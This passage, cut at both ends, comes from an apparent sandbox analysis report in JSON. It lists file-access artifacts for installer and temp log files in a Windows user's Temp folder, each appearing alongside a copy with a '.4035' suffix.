7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00002.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00002.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00002.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00002.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00003.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00003.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00003.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00003.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00004.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00004.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00004.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00004.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00005.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00005.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00005.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00005.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\AUCHECK_PARSER.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aucheck_parser.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\AUCHECK_PARSER.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aucheck_parser.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\BHlM4unK27DZ9.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bhlm4unk27dz9.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\BHlM4unK27DZ9.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bhlm4unk27dz9.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\BoIplhK0r.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\boiplhk0r.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\BoIplhK0r.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\boiplhk0r.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\chrome_installer.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\chrome_installer.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\chrome_installer.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\chrome_installer.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_depcheck_NETFX_EXP_35.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_depcheck_netfx_exp_35.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_depcheck_NETFX_EXP_35.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_depcheck_netfx_exp_35.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotnetfx35error.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx35error.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotnetfx35error.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx35error.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotnetfx35install.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx35install.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotnetfx35install.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx35install.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotNetFx40_Full_x86_x64_decompression_log.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx40_full_x86_x64_decompression_log.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotNetFx40_Full_x86_x64_decompression_log.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx40_full_x86_x64_decompression_log.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotnetfx45_full_x86_x64_decompression_log.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx45_full_x86_x64_decompression_log.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_dotnetfx45_full_x86_x64_decompression_log.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_dotnetfx45_full_x86_x64_decompression_log.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_NDP46-KB3045557-x86-x64-AllOS-ENU_decompression_log.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_ndp46-kb3045557-x86-x64-allos-enu_decompression_log.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_NDP46-KB3045557-x86-x64-AllOS-ENU_decompression_log.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_ndp46-kb3045557-x86-x64-allos-enu_decompression_log.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_SetupUtility.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_setuputility.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_SetupUtility.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_setuputility.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistMSI3A7F.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistmsi3a7f.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistMSI3A7F.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistmsi3a7f.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistMSI3AC0.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistmsi3ac0.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistMSI3AC0.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistmsi3ac0.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistUI3A7F.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistui3a7f.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistUI3A7F.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistui3a7f.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistUI3AC0.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistui3ac0.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredistUI3AC0.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredistui3ac0.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160254.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160254.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160254.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160254.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160254_0_vcRuntimeMinimum_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160254_0_vcruntimeminimum_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160254_0_vcRuntimeMinimum_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160254_0_vcruntimeminimum_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160254_1_vcRuntimeAdditional_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160254_1_vcruntimeadditional_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160254_1_vcRuntimeAdditional_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160254_1_vcruntimeadditional_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160359.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160359.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160359.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160359.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160359_0_vcRuntimeMinimum_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160359_0_vcruntimeminimum_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160359_0_vcRuntimeMinimum_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160359_0_vcruntimeminimum_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160359_1_vcRuntimeAdditional_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160359_1_vcruntimeadditional_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160359_1_vcRuntimeAdditional_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160359_1_vcruntimeadditional_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160506.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160506.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160506.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160506.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160506_000_vcRuntimeMinimum_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160506_000_vcruntimeminimum_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160506_000_vcRuntimeMinimum_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160506_000_vcruntimeminimum_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160506_001_vcRuntimeAdditional_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160506_001_vcruntimeadditional_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170623160506_001_vcRuntimeAdditional_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170623160506_001_vcruntimeadditional_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115847.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115847.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115847.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115847.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115847_000_vcRuntimeMinimum_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115847_000_vcruntimeminimum_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115847_000_vcRuntimeMinimum_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115847_000_vcruntimeminimum_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115847_001_vcRuntimeAdditional_x64.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115847_001_vcruntimeadditional_x64.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115847_001_vcRuntimeAdditional_x64.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115847_001_vcruntimeadditional_x64.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115955.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115955.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_amd64_20170712115955.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_amd64_20170712115955.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160219.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160219.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160219.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160219.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160219_0_vcRuntimeMinimum_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160219_0_vcruntimeminimum_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160219_0_vcRuntimeMinimum_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160219_0_vcruntimeminimum_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160219_1_vcRuntimeAdditional_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160219_1_vcruntimeadditional_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160219_1_vcRuntimeAdditional_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160219_1_vcruntimeadditional_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160331.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160331.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160331.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160331.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160331_0_vcRuntimeMinimum_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160331_0_vcruntimeminimum_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160331_0_vcRuntimeMinimum_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160331_0_vcruntimeminimum_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160331_1_vcRuntimeAdditional_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160331_1_vcruntimeadditional_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160331_1_vcRuntimeAdditional_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160331_1_vcruntimeadditional_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160420.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160420.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160420.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160420.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160420_000_vcRuntimeMinimum_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160420_000_vcruntimeminimum_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160420_000_vcRuntimeMinimum_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160420_000_vcruntimeminimum_x86.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160420_001_vcRuntimeAdditional_x86.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\dd_vcredist_x86_20170623160420_001_vcruntimeadditional_x86.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\dd_vcredist_x86_20170623160420_001_vcRuntimeAdditional_x86.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 